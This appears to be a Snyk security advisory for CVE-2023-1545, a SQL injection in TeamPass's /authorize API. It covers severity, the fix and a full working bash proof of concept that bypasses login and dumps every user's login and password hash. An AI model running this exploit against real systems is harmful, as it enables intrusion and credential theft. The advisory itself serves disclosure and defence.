SQL Injection Affecting nilsteampassnet/teampass package, versions >=0.0.0, <3.0.10
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.13% (48th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-NILSTEAMPASSNETTEAMPASS-3367613
- published 22 Mar 2023
- disclosed 21 Mar 2023
- credit Sonia Zorba
Introduced: 21 Mar 2023
CVE-2023-1545 Open this link in a new tabHow to fix?
Upgrade nilsteampassnet/teampass
to version 3.0.10 or higher.
Overview
nilsteampassnet/teampass is a password manager.
Affected versions of this package are vulnerable to SQL Injection via the /authorize
API endpoint, by forging an arbitrary Blowfish hash and using it in the query to bypass the password verification check.
PoC
if [ "$#" -lt 1 ]; then
echo "Usage: $0 <base-url>"
exit 1
fi
vulnerable_url="$1/api/index.php/authorize"
check=$(curl --silent "$vulnerable_url")
if echo "$check" | grep -q "API usage is not allowed"; then
echo "API feature is not enabled :-("
exit 1
fi
# htpasswd -bnBC 10 "" h4ck3d | tr -d ':\n'
arbitrary_hash='$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'
exec_sql() {
inject="none' UNION SELECT id, '$arbitrary_hash', ($1), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin"
data="{\"login\":\""$inject\"",\"password\":\"h4ck3d\", \"apikey\": \"foo\"}"
token=$(curl --silent --header "Content-Type: application/json" -X POST --data "$data" "$vulnerable_url" | jq -r '.token')
echo $(echo $token| cut -d"." -f2 | base64 -d 2>/dev/null | jq -r '.public_key')
}
users=$(exec_sql "SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
echo "There are $users users in the system:"
for i in `seq 0 $(($users-1))`; do
username=$(exec_sql "SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1")
password=$(exec_sql "SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1")
echo "$username: $password"
done